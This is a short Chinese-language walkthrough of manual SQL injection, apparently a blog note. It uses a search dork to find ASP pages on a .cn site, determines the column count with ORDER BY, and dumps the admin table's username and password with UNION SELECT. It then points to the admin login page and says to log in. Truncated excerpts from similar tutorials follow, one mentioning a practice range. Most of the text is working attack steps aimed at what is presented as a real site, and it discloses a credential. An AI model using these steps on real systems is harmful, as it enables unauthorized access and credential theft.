site:xx.cn inurl:asp?id= //找文章
xx.cn/pth/onews.asp?id=243' //試注入
xx.cn/pth/onews.asp?id=243 order by 10
xx.cn/pth/onews.asp?id=243 order by 20 //order by 語句用於根據指定的列(字段)對結果集進行排序,這裡是在爆字段長度
爆出字段長度為11
聯合查詢
xx.cn/pth/onews.asp?id=243 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
或者xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
爆出2&&3,用字段(admin表中的admin欄位與password欄位)替換掉2&&3
xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
爆出賬號與密碼:
賬號:admin
密碼:bfpms
找到後台:xx.cn/pth/admin/adminlogin.asp
登陸即可
sql注入 手工注入
表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...
sql手工注入原理
純粹一些個人練習心得,所以今天就寫一篇部落格記錄一下 數值型 1.url輸入 and 1 1 and 1 2 回顯頁面不同 整形判斷 如果頁面執行錯誤,則說明此 sql 注入為數字型注入。因為當我們輸入 and 1 1時,後台執行 sql 語句 如 select from 表名 where id x...
SQL手工注入方法
sql手工注入漏洞測試 mysql資料庫 的靶場練習 流程與方法 注意 加粗部分給重點 查詢資料庫名 union select 1,database 3,4 from information schema.tables 獲取到的庫名 mozhe discuz stormgroup 查詢庫下的表名 u...